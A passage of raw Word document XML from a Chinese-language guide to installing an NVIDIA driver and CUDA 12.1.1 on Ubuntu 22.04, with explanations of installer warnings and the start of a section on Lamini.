      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>重新运行.</w:t>
      </w:r>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>的N卡驱动，如下，不会再有报错，而是直接进行构建。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCD3CE8" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BA67F8D" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26848248" wp14:editId="4486D887">
            <wp:extent cx="5274310" cy="1701800"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="501073121" name="图片 1" descr="电脑萤幕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73121" name="图片 1" descr="电脑萤幕画面&#10;&#10;中度可信度描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId262"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="1701800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D781405" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02A4EED1" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>又有报错，如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6A8A17" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>错误1：这里是说x</w:t>
      </w:r>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>,org</w:t>
      </w:r>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>的东西，是关于图形化界面输出的，和桌面版有关，和我们无关，可以直接拒绝。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4056BE" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>WARNING: nvidia-installer was forced to guess the X library path '/usr/lib' and X module path '/usr/lib/xorg/modules'; these paths were not queryable from the system.  If X fails to find the NVIDIA X</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354CA54F" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">           driver module, please install the `pkg-config` utility and the X.Org SDK/development package for your distribution and reinstall the driver.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586EA0CA" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="271B3E1A" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>错误2：这个警告消息是告诉你，虽然你正在安装的</w:t>
      </w:r>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> NVIDIA 驱动包含了 Vulkan 组件，但是你的系统上并没有检测到 Vulkan ICD 加载器。没有这个加载器，NVIDIA 的 Vulkan ICD 将无法工作。Vulkan 是一个由 Khronos Group 开发的跨平台的图形和计算 API，它可以提供高效的、低级别的硬件抽象。</w:t>
      </w:r>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>随意。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2A2151" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>WARNING: This NVIDIA driver package includes Vulkan components, but no Vulkan ICD loader was detected on this system. The NVIDIA Vulkan ICD will not function without the loader. Most distributions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4D1144" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">           package the Vulkan loader; try installing the "vulkan-loader", "vulkan-icd-loader", or "libvulkan1" package.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799C4CAB" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C363CC5" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>最终安装成功：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C64D1F" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="042D7AC1" wp14:editId="5FCAEB12">
            <wp:extent cx="5274310" cy="1522730"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="1837144882" name="图片 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44882" name="图片 1" descr="电脑萤幕的截图&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId263"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="1522730"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D898C55" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>执行命令：</w:t>
      </w:r>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>nvidia-smi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D96C33" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06A8EAC8" wp14:editId="1943BAF3">
            <wp:extent cx="5274310" cy="2315845"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="938939379"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39379" name="图片 1" descr="图形用户界面&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId264"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="2315845"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7018B9C4" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F9B7ADA" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AC4F7B5" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="260" w:after="260" w:line="416" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="等线 Light" w:eastAsia="等线 Light" w:hAnsi="等线 Light" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线 Light" w:eastAsia="等线 Light" w:hAnsi="等线 Light" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>安装cuda</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415F8DA1" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09C94025" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>官方驱动：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08AE7914" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>https://developer.nvidia.com/cuda-downloads?target_os=Linux&amp;target_arch=x86_64&amp;Distribution=Ubuntu&amp;target_version=22.04&amp;target_type=runfile_local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28679922" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="296A6EEA" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>该选项生成命令如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732DDE5F" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>wget https://developer.download.nvidia.com/compute/cuda/12.1.1/local_installers/cuda_12.1.1_530.30.02_linux.run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B8DAC6" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BADA5EF" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sudo sh cuda_12.1.1_530.30.02_linux.run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC3B104" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="116AD593" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A902A44" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17B23F95" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C3DF88B" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6074B5ED" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="340" w:after="330" w:line="578" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="44"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="44"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="44"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>amini</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78741F3C" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>官方</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DF2E58" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>https://lamini.ai/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2201AF07" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35A456D7" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>文档</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA451E4" w14:textId="77777777" w:rsidR="00700408" w:rsidRPr="00700408" w:rsidRDefault="00700408" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700408">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
